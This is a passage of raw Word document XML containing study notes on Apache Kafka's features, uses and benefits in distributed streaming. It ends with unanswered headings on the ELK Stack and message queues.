          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kafka stores streams of data in a fault-tolerant manner across multiple brokers. Data is replicated across brokers to ensure reliability and high availability. This makes Kafka suitable for mission-critical applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FC7258" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="628"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Stream Processing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BB995A" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="628"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Kafka Streams, a library within Kafka, allows developers to build real-time stream processing applications. Kafka Streams processes data directly from Kafka topics, performs transformations, and outputs the results to other topics or systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF6BD13" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="628"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Event Sourcing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C088A0" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="628"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kafka’s append-only log structure makes it an ideal platform for event sourcing, where state changes (events) are recorded sequentially and can be replayed to reconstruct past states.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C462C61" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="628"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Integration with External Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B215F4D" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="628"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kafka Connect is a framework for integrating Kafka with external data sources and sinks (e.g., databases, file systems, and cloud services). Connectors are used to move data in and out of Kafka seamlessly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A51F38E" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Roles of Kafka in Distributed Streaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F93541" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Real-Time Data Pipelines:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677CA799" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kafka is commonly used to build real-time data pipelines that move data between different systems or applications in real-time. For example, Kafka can ingest data from IoT devices, process it using stream processing, and store the results in a database or data lake.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34368022" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Event-Driven Architectures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DE733E" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kafka is well-suited for event-driven architectures where microservices or applications communicate through events. Kafka acts as a central hub, allowing services to publish and subscribe to events, ensuring loose coupling and scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F7D1A9" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Log Aggregation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F332CD1" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kafka can aggregate logs from multiple services and systems into a centralized location. This enables real-time monitoring, alerting, and analysis of log data across distributed systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094B2166" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Data Integration and ETL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224D06DF" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kafka serves as the backbone for ETL (Extract, Transform, Load) pipelines, where data is ingested, transformed, and loaded into target systems. Kafka’s ability to handle large volumes of data makes it ideal for these scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000D5110" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Metrics and Monitoring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EB8132" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kafka is used to collect and process metrics, logs, and telemetry data from distributed systems. This data can be consumed by monitoring tools for real-time dashboards, alerts, and operational insights.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC81F59" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Benefits of Kafka as a Distributed Streaming Platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A678C10" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="630"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Scalability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21753DD2" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="630"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kafka’s partitioned log model allows it to scale horizontally by adding more brokers and partitions. This makes Kafka capable of handling millions of events per second.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D16C5E" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="630"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Fault Tolerance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62372C23" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="630"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kafka replicates data across multiple brokers, ensuring high availability and fault tolerance. In case of a broker failure, Kafka can recover data and maintain service continuity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A51A52" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="630"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>High Throughput and Low Latency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEFB34D" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="630"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kafka is designed to handle high-throughput workloads with low latency. Its architecture enables efficient data writing and reading, making it suitable for real-time applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBE6005" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="630"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Durability and Persistence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457691DB" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="630"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kafka stores data on disk with configurable retention policies. This ensures that data is durable and can be retained for as long as needed, allowing consumers to process data at their own pace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C66A14" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="630"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Flexibility:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E07436" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="630"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kafka can be used for a wide range of use cases, from simple message brokering to complex stream processing. Its ecosystem includes tools like Kafka Streams, Kafka Connect, and KSQL, which extend its capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFEF02C" w14:textId="77777777" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00EB2BF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="591E9214" w14:textId="0065B486" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="181" w:name="_Toc178383363"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explain the components of the ELK Stack (Elasticsearch, Logstash, Kibana) and its use for log management and analytics.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="181"/>
    </w:p>
    <w:p w14:paraId="0312772C" w14:textId="77777777" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00EB2BF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3219395E" w14:textId="324262DB" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="182" w:name="_Toc178383364"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Discuss how message queues facilitate asynchronous communication between backend services.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="182"/>
